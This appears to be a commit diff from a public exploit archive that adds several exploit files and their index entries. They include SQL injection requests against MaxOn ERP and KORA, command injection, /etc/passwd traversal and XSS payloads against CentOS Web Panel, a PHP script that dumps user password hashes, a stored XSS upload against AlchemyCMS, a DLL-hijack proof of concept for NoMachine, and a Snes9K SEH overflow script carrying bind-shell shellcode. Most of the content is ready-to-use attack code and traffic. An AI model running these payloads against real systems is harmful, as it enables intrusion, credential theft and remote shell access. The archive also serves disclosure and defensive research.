exploits/php/webapps/45605.txt Normal file
View file

@ -0,0 +1,118 @@
# Exploit Title: MaxOn ERP Software 8.x-9.x - 'nomor' SQL Injection
# Dork: N/A
# Date: 2018-10-15
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.talagasoft.com
# Software Link: http://demo.maxonerp.com/
# Software Download: https://datapacket.dl.sourceforge.net/project/maxon/maxon.rar
# Version: 8.x-9.x
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# Description
# All users can run sql injection codes.
#
# [PATH]/pos/controllers/User.php Line:350
# [PATH]/application/controllers/User.php Line:414
# function log_activity(){
# $sql="select * from syslog where 1=1";
# $nomor="";$jenis="";$user="";
# if($this->input->post()){
# if($nomor=$this->input->post('nomor')){
# if($nomor!="")$sql.=" and no_bukti='$nomor'";
# }
# if($user=$this->input->post('user')){
# if($user!="")$sql.=" and userid='$user'";
# }
# if($jenis=$this->input->post('jenis')){
# if($jenis!="")$sql.=" and jenis_cmd='$jenis'";
# }
#
# }
# $sql.=" order by tgljam desc limit 1000";
# $data["user"]=$user;
# $data["nomor"]=$nomor;
# $data["jenis"]=$jenis;
#
# $data['syslog']=$this->db->query($sql);
# $this->template->display("log_list",$data);
# }
# POC:
# 1)
# http://TARGET/[PATH]/index.php/user/log_activity
POST /index.php/user/log_activity HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ci_session=3ba3e8a3b82a8e489cd16703fa5d0d327b84074c
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 253
nomor=%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58
HTTP/1.1 500 Internal Server Error
Date: Sat, 15 Oct 2018 00:22:45 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Powered-By: PleskLin
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://TARGET/[PATH]/index.php/user/log_activity
POST /index.php/user/log_activity HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ci_session=3ba3e8a3b82a8e489cd16703fa5d0d327b84074c
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 252
user=%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58
HTTP/1.1 500 Internal Server Error
Date: Sat, 15 Oct 2018 00:29:02 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Powered-By: PleskLin
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 3)
# http://TARGET/[PATH]/index.php/user/log_activity
POST /index.php/user/log_activity HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ci_session=3ba3e8a3b82a8e489cd16703fa5d0d327b84074c
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 253
jenis=%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58
HTTP/1.1 500 Internal Server Error
Date: Sat, 15 Oct 2018 00:35:52 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Powered-By: PleskLin
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

172
exploits/php/webapps/45610.txt Normal file
View file

@ -0,0 +1,172 @@
# Exploit Title: Centos Web Panel 0.9.8.480 Multiple Vulnerabilities
# Exploit Author: Seccops - Siber Güvenlik Hizmetleri (https://seccops.com)
# Vendor Homepage: http://centos-webpanel.com/
# Software Link: http://centos-webpanel.com/system-requirements
# Version: 0.9.8.480
# Tested on: Centos 7
# Vulnerability Types: Command Injection, Local File Inclusion, Cross-site Scripting, Frame Injection
# CVE: -
### Vulnerability Name: Command Injection ###
1)
Proof URL: http://localhost:2030/admin/index.php?service_start=opendkim;expr 268409241 - 2;x
Parameter Name: service_start
Parameter Type: GET
Attack Pattern: opendkim%3bexpr+268409241+-+2%3bx
HTTP Request:
GET /admin/index.php?service_start=opendkim%3bexpr%20268409241%20-%202%3bx HTTP/1.1
Host: localhost:2030
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: cwpsrv-983b3c1326b3c5dafa7941a1ef2fbf67=jhg556f3k83kpgbhbdfsd0pps6; resolve_ids=0; roundcube_sessid=j2h7ad1kb1coji7hba2bo5pil5; order_dir_list_by=7D
Referer: http://localhost:2030/admin/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
Note: Mathematical process: 268409241 - 2. So, the result is expected 268409239.
HTTP Response:
HTTP/1.1 200 OK
Server: cwpsrv
X-Powered-By: PHP/7.0.24
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Mon, 01 Oct 2018 21:06:42 GMT
Cache-Control: no-store, no-cache, must-revalidate
HTML Content:
<div class='alert alert-warning'>
<button type='button' class='close' data-dismiss='alert'>×</button>
<strong>WARNING!</strong> <pre>268409239
sh: x.service: command not found
</pre><br>
2)
Proof URL: http://localhost:2030/admin/index.php?service_restart=sshd;expr 268409241 - 2;x
Parameter Name: service_restart
Parameter Type: GET
Attack Pattern: sshd%3bexpr+268409241+-+2%3bx
3)
Proof URL: http://localhost:2030/admin/index.php?service_fullstatus=opendkim;expr 268409241 - 2;x
Parameter Name: service_fullstatus
Parameter Type: GET
Attack Pattern: opendkim%3bexpr+268409241+-+2%3bx
4)
Proof URL: http://localhost:2030/admin/index.php?service_stop=named;expr 268409241 - 2;x
Parameter Name: service_stop
Parameter Type: GET
Attack Pattern: named%3bexpr+268409241+-+2%3bx
### Vulnerability Name: Local File Inclusion ###
1)
Proof URL: http://localhost:2030/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd
Parameter Name: file
Parameter Type: GET
Attack Pattern: %2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
HTTP Request:
GET /admin/index.php?module=file_editor&file=%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: localhost:2030
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: cwpsrv-983b3c1326b3c5dafa7941a1ef2fbf67=jhg556f3k83kpgbhbdfsd0pps6; resolve_ids=0; roundcube_sessid=j2h7ad1kb1coji7hba2bo5pil5; order_dir_list_by=7D
Referer: http://localhost:2030/admin/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
HTTP Response:
HTTP/1.1 200 OK
Server: cwpsrv
X-Powered-By: PHP/7.0.24
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Mon, 01 Oct 2018 20:45:19 GMT
Cache-Control: no-store, no-cache, must-revalidate
HTML Content:
File info <a href='index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd&stats=yes'>[stats]</a>:<pre>-rw-r--r-- 1 root root 2272 Sep 28 07:48 /../../../../../../../../../../../etc/passwd
</pre><h3>Contents of File: /../../../../../../../../../../../etc/passwd</h3>
<form action='' method= 'post'>
<textarea id='textarea' name='newd' cols='100%' rows='50'>root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
etc...
### Vulnerability Name: Cross-site Scripting & Frame Injection ###
1)
Proof URL: http://localhost:2030/admin/fileManager2.php?frame=3&action=8&cmd_arg=design&fm_current_dir=<scRipt>alert(1)</scRipt>
Parameter Name: fm_current_dir
Parameter Type: GET
Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e
Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e
2)
Proof URL: http://localhost:2030/admin/index.php?module=<scRipt>alert(1)</scRipt>&file=/etc/sysconfig/selinux
Parameter Name: module
Parameter Type: GET
Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e
Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e
3)
Proof URL: http://localhost:2030/admin/index.php?service_start=<scRipt>alert(1)</scRipt>
Parameter Name: service_start
Parameter Type: GET
Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e
Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e
4)
Proof URL: http://localhost:2030/admin/index.php?service_fullstatus=<scRipt>alert(1)</scRipt>
Parameter Name: service_fullstatus
Parameter Type: GET
Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e
Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e
5)
Proof URL: http://localhost:2030/admin/index.php?service_restart=<scRipt>alert(1)</scRipt>
Parameter Name: service_restart
Parameter Type: GET
Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e
Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e
6)
Proof URL: http://localhost:2030/admin/index.php?service_stop=<scRipt>alert(1)</scRipt>
Parameter Name: service_stop
Parameter Type: GET
Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e
Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e
7)
Proof URL: http://localhost:2030/admin/index.php?module=file_editor&file=<scRipt>alert(1)</scRipt>
Parameter Name: file
Parameter Type: GET
Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e
Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e
8)
Proof URL: http://localhost:2030/admin/index.php?module=<scRipt>alert(1)</scRipt>&dir=/var/log
Parameter Name: module
Parameter Type: GET
Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e
Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e

60
exploits/php/webapps/45612.php Normal file
View file

@ -0,0 +1,60 @@
<?php
# Exploit Title: Academic Timetable Final Build 7.0a-7.0b - User Information Disclosure
# Dork: N/A
# Date: 2018-10-13
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://geoffpartridge.net/
# Software Link: https://sourceforge.net/projects/timetableacademic/files/latest/download
# Version: 7.0a-7.0b
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
header ('Content-type: text/html; charset=UTF-8');
$urlemiz= "http://192.168.1.27/[PATH]/";
$yuk="server_user.php?sEcho=10&iColumns=10&iDisplayStart=0&iDisplayLength=10&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSearchable_3=0";
$jsonveri = file_get_contents($urlemiz.$yuk);
$ver = json_decode($jsonveri,true);
echo "<pre>\n";
print_r($ver);
echo "\n</pre>";
/**
Array
(
[sEcho] => 10
[iTotalRecords] => 3
[iTotalDisplayRecords] => 3
[aaData] => Array
(
[0] => Array
(
[0] => testdb1
[1] => testdb1
[2] => ADMIN
[3] => *6CC4E8CFFEAF202D7475BC906612F9A29A9C8117
)
[1] => Array
(
[0] => ADMIN
[1] => admin
[2] => ADMIN
[3] => *4ACFE3202A5FF5CF467898FC58AAB1D615029441
)
[2] => Array
(
[0] => STAFF
[1] => Staff
[2] => VIEW
[3] =>
)
)
)
*/
?>

38
exploits/php/webapps/45613.txt Normal file
View file

@ -0,0 +1,38 @@
# Exploit Title: KORA 2.7.0 - SQL Injection
# Dork: N/A
# Date: 2018-10-13
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.matrix.msu.edu/
# Software Link: https://sourceforge.net/projects/kora/files/latest/download
# Version: 2.7.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/ajax/control.php?action=assocSearch&pid=1&sid=1&cid=[SQL]&keywords=1
#
# (CASE WHEN (22=22) THEN 22 ELSE 1*(SELECT 22 FROM DUAL UNION SELECT 66 FROM DUAL) END)
#
# 1)+UNION+ALL+SELECT+null,null,null,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())--+-
#
GET /[PATH]/ajax/control.php?action=assocSearch&pid=1&sid=1&cid=-1)+UNION+ALL+SELECT+null,null,null,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())--+-&keywords=1 HTTP/1.1
Host: 192.168.1.27
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Fri, 13 Oct 2018 02:01:22 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: PHPSESSID=pa377tajtaocbeauhd67llk8l4; path=/
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 536
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
#

0
exploits/php/webapps/45592.txt → exploits/ruby/webapps/45592.txt
View file

44
exploits/ruby/webapps/45601.txt Normal file
View file

@ -0,0 +1,44 @@
# Exploit Title: AlchemyCMS 4.1 - Cross-Site Scripting
# Date: 2018-10-14
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://alchemy-cms.com/
# Software Link : https://github.com/AlchemyCMS/alchemy_cms
# Software : AlchemyCMS
# Version : 4.1-stable
# Vulernability Type : Cross-site Scripting
# Vulenrability : Stored XSS
# CVE : N/A
# A Stored XSS vulnerability has been discovered in version 4.1.0 of AlchemyCMS via the /admin/pictures image field.
# HTTP POST Request :
POST /admin/pictures HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://TARGET/admin/pages/80/edit
X-CSRF-Token: E6zZ6vohGua9Q0arzQVTUTmq/fJw48xBnkmfQeYxILYtmRAhDcxkaV5FeGyajgOtSXMs7r9xms7Wo44PEP9HTg==
X-Requested-With: XMLHttpRequest
Content-Length: 1574870
Content-Type: multipart/form-data; boundary=---------------------------10875577401849011681645409128
Cookie: _alchemy_demo_session=%2BSKdSGUIZALtIkYucZKu36eXcVTh4kSCFKjcxqLyFnd%2B5C87xtdx6%2B4Zkjy31YpXRzXI1nwu3BsIvI9v6eYio%2BOh1S3Kb1wd3YcARJTGJeK8ByX9N45trldIwmxK09FqDTMv897K3%2F%2Fe05YiJUEwz2jGkuXkiaxk37AHmjuJNtSNwLfGwAakOWN%2FKQvqAbl%2BMWV9crpeUuq66p6%2Bar1WmGmRcNDqUcfnDFfLmNa8%2BlCBNjieI5N0kpAv2xBJ30EZqoxee13TmKhvPoU4m3UehLKToa8gW5tCQQy7N3BF6ipZa5H1l16%2FxzwPEJl37F3T5%2F%2FkFr4JOxtYSiH9Nd1itpJjMBSZkGAou49SZoBq%2F23r%2BbENN81HrstL2TlaHkxeFdivOnAjBgwpst1qj570WU22FOQeKo80fWnARs23lCHAJy2RyY8dENcpagIQUgdbxqlCaEDqcUnnroZj0g8mhjG%2FdD2cLdym3usSVBmLoiVIPTcHf5T%2FavLUpF6PC0hUwgNEwgNZKzunlPl8tr17e9t9--RjgT8BiSM30kK4WY--s%2BPgcdnz62DCJTK14z5aag%3D%3D; __atuvc=3%7C42; __atuvs=5bc38ae909d900c3002
Connection: close
-----------------------------10875577401849011681645409128
Content-Disposition: form-data; name="utf8"
✓
-----------------------------10875577401849011681645409128
Content-Disposition: form-data; name="authenticity_token"
GqjmyJ8FM+6rE6IIK5Or6Znszlg8ilvkUKsYJsqT3l3Cl7GAKn8L6xoCio55o9IaxztHwOKOSsRHz5vb4LTOGA==
-----------------------------10875577401849011681645409128
Content-Disposition: form-data; name="picture[upload_hash]"
2507832911685091350
-----------------------------10875577401849011681645409128
Content-Disposition: form-data; name="picture[image_file]"; filename="\"><img src=x onerror=alert(\"ismailtasdelen\")>.jpg"
Content-Type: image/jpeg

1
exploits/windows/local/45583.txt
View file

@ -9,6 +9,7 @@
# http://hyp3rlinx.altervista.org/advisories/MICROSOFT-SQL-SERVER-MGMT-STUDIO-REGSRVR-FILES-XML-INJECTION-CVE-2018-8533.txt
# https://www.zerodayinitiative.com/advisories/ZDI-18-1133/
# https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8533
# The author was credited by the vendor (https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8533)
# Description
# This vulnerability allows remote attackers to disclose sensitive information on vulnerable

1
exploits/windows/local/45585.txt
View file

@ -9,6 +9,7 @@
# http://hyp3rlinx.altervista.org/advisories/MICROSOFT-SQL-SERVER-MGMT-STUDIO-XEL-FILETYPE-XML-INJECTION-CVE-2018-8527.txt
# https://www.zerodayinitiative.com/advisories/ZDI-18-1131/
# https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8527
# The author was credited by the vendor (https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8527)
# Description
# This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations

2
exploits/windows/local/45587.txt
View file

@ -9,6 +9,8 @@
# http://hyp3rlinx.altervista.org/advisories/MICROSOFT-SQL-SERVER-MGMT-STUDIO-XMLA-FILETYPE-XML-INJECTION-CVE-2018-8532.txt
# https://www.zerodayinitiative.com/advisories/ZDI-18-1132/
# https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8532
# The author was credited by the vendor (https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8532)
# so this is marked as verified
# Security Issue
# This vulnerability allows remote attackers to disclose sensitive information on

111
exploits/windows/remote/45611.c Normal file
View file

@ -0,0 +1,111 @@
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/NOMACHINE-TROJAN-FILE-REMOTE-CODE-EXECUTION.txt
[+] ISR: ApparitionSec
Greetz: ***Greetz: indoushka | Eduardo ***
[Vendor]
www.nomachine.com
[Product]
NoMachine <= v5.3.26
NX technology, developed by NoMachine, and commonly known as "NX" is a proprietary computer program that provides desktop and remote access.
It consists of a suite of products for desktop virtualization and application delivery for servers, and client software.
[Vulnerability Type]
Trojan File Remote Code Execution
[Affected Component]
wintab32.dll
[CVE Reference]
CVE-2018-17980
[Security Issue]
Possible arbitrary code execution when opening a ".nxs" nomachine file type on client's wintab32.dll preload.
This issue regards the client part of all NoMachine installations on Windows (NoMachine free, NoMachine Enterprise Client, NoMachine Enteprise Desktop and NoMachine Cloud Server).
1) create a 32 bit DLL named "wintab32.dll"
2) create an native nomachine ".NXS" file and open it alongside the trojan "wintab32.dll" DLL from Network share or any dir.
BOOM!
[References]
https://www.nomachine.com/TR10P08887
[Exploit/POC]
#include <windows.h>
/* hyp3rlinx */
/*
gcc -c -m32 wintab32.c
gcc -shared -m32 -o wintab32.dll wintab32.o
*/
void executo(){
MessageBox( 0, "3c184981367094fce3ab70efc3b44583" , ":)" , MB_YESNO + MB_ICONQUESTION );
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved){
switch(fdwReason){
case DLL_PROCESS_ATTACH:{
executo();
break;
}
case DLL_PROCESS_DETACH:{
executo();
break;
}
case DLL_THREAD_ATTACH:{
executo();
break;
}
case DLL_THREAD_DETACH:{
executo();
break;
}
}
return TRUE;
}
[Network Access]
Remote
[Severity]
High
[Disclosure Timeline]
Vendor Notification: September 26, 2018
Vendor verified vulnerability: September 28, 2018
CVE assigned by Mitre: October 4, 2018
Vendor release fixed version: October 11, 2018
October 11, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx

58
exploits/windows_x86/local/45598.py Executable file
View file

@ -0,0 +1,58 @@
# Exploit Title: Snes9K 0.0.9z - Buffer Overflow (SEH)
# Date: 2018-10-13
# Exploit Author: Abdullah Alıç
# Vendor Homepage: https://sourceforge.net/projects/snes9k/
# Software Link: https://sourceforge.net/projects/snes9k/files/latest/download
# Version: 0.0.9z
# Tested on: Windows XP Professional sp3(ENG)
# Category: Windows Local Exploit
# How to use: open the program go to "Netplay --> Options" paste the contents of boom.txt
# in Socket Port Number --> Connect victim machine on port 4444
#!/usr/bin/python
#msfvenom -p windows/shell_bind_tcp -b "\x00\x0a\x0d\x9f\x8f\x8e\x8d\x9e\x9d\xd0\xdd\xfd\xfe\xf0\xde" -f python
#352 bytes
buf = ""
buf += "\x2b\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e\x81"
buf += "\x76\x0e\x43\x2b\x2a\x41\x83\xee\xfc\xe2\xf4\xbf\xc3"
buf += "\xa8\x41\x43\x2b\x4a\xc8\xa6\x1a\xea\x25\xc8\x7b\x1a"
buf += "\xca\x11\x27\xa1\x13\x57\xa0\x58\x69\x4c\x9c\x60\x67"
buf += "\x72\xd4\x86\x7d\x22\x57\x28\x6d\x63\xea\xe5\x4c\x42"
buf += "\xec\xc8\xb3\x11\x7c\xa1\x13\x53\xa0\x60\x7d\xc8\x67"
buf += "\x3b\x39\xa0\x63\x2b\x90\x12\xa0\x73\x61\x42\xf8\xa1"
buf += "\x08\x5b\xc8\x10\x08\xc8\x1f\xa1\x40\x95\x1a\xd5\xed"
buf += "\x82\xe4\x27\x40\x84\x13\xca\x34\xb5\x28\x57\xb9\x78"
buf += "\x56\x0e\x34\xa7\x73\xa1\x19\x67\x2a\xf9\x27\xc8\x27"
buf += "\x61\xca\x1b\x37\x2b\x92\xc8\x2f\xa1\x40\x93\xa2\x6e"
buf += "\x65\x67\x70\x71\x20\x1a\x71\x7b\xbe\xa3\x74\x75\x1b"
buf += "\xc8\x39\xc1\xcc\x1e\x43\x19\x73\x43\x2b\x42\x36\x30"
buf += "\x19\x75\x15\x2b\x67\x5d\x67\x44\xd4\xff\xf9\xd3\x2a"
buf += "\x2a\x41\x6a\xef\x7e\x11\x2b\x02\xaa\x2a\x43\xd4\xff"
buf += "\x2b\x4b\x72\x7a\xa3\xbe\x6b\x7a\x01\x13\x43\xc0\x4e"
buf += "\x9c\xcb\xd5\x94\xd4\x43\x28\x41\x52\x77\xa3\xa7\x29"
buf += "\x3b\x7c\x16\x2b\xe9\xf1\x76\x24\xd4\xff\x16\x2b\x9c"
buf += "\xc3\x79\xbc\xd4\xff\x16\x2b\x5f\xc6\x7a\xa2\xd4\xff"
buf += "\x16\xd4\x43\x5f\x2f\x0e\x4a\xd5\x94\x2b\x48\x47\x25"
buf += "\x43\xa2\xc9\x16\x14\x7c\x1b\xb7\x29\x39\x73\x17\xa1"
buf += "\xd6\x4c\x86\x07\x0f\x16\x40\x42\xa6\x6e\x65\x53\xed"
buf += "\x2a\x05\x17\x7b\x7c\x17\x15\x6d\x7c\x0f\x15\x7d\x79"
buf += "\x17\x2b\x52\xe6\x7e\xc5\xd4\xff\xc8\xa3\x65\x7c\x07"
buf += "\xbc\x1b\x42\x49\xc4\x36\x4a\xbe\x96\x90\xda\xf4\xe1"
buf += "\x7d\x42\xe7\xd6\x96\xb7\xbe\x96\x17\x2c\x3d\x49\xab"
buf += "\xd1\xa1\x36\x2e\x91\x06\x50\x59\x45\x2b\x43\x78\xd5"
buf += "\x94"
nseh= "\xeb\x06\x90\x90"
seh = "\x39\x1f\xd1\x72" #POP-POP-RET msacm32.drv
buffer = "\x90" * 244 + nseh + seh + buf + "\x90"*20
payload = buffer
try:
f=open("boom.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

18
files_exploits.csv
View file

@ -10031,6 +10031,7 @@ id,file,description,date,author,type,platform,port
45583,exploits/windows/local/45583.txt,"Microsoft SQL Server Management Studio 17.9 - XML External Entity Injection",2018-10-11,hyp3rlinx,local,windows,
45585,exploits/windows/local/45585.txt,"Microsoft SQL Server Management Studio 17.9 - '.xel' XML External Entity Injection",2018-10-11,hyp3rlinx,local,windows,
45587,exploits/windows/local/45587.txt,"Microsoft SQL Server Management Studio 17.9 - '.xmla' XML External Entity Injection",2018-10-11,hyp3rlinx,local,windows,
45598,exploits/windows_x86/local/45598.py,"Snes9K 0.0.9z - Buffer Overflow (SEH)",2018-10-15,"Abdullah Alıç",local,windows_x86,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16868,6 +16869,7 @@ id,file,description,date,author,type,platform,port
45559,exploits/linux/remote/45559.rb,"Unitrends UEB - HTTP API Remote Code Execution (Metasploit)",2018-10-08,Metasploit,remote,linux,443
45561,exploits/php/remote/45561.rb,"Navigate CMS - Unauthenticated Remote Code Execution (Metasploit)",2018-10-08,Metasploit,remote,php,
45574,exploits/windows/remote/45574.rb,"Delta Electronics Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (Metasploit)",2018-10-09,Metasploit,remote,windows,502
45611,exploits/windows/remote/45611.c,"NoMachine < 5.3.27 - Remote Code Execution",2018-10-15,hyp3rlinx,remote,windows,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -39512,6 +39514,7 @@ id,file,description,date,author,type,platform,port
44164,exploits/php/webapps/44164.txt,"Joomla! Component Proclaim 9.1.1 - Arbitrary File Upload",2018-02-22,"Ihsan Sencan",webapps,php,
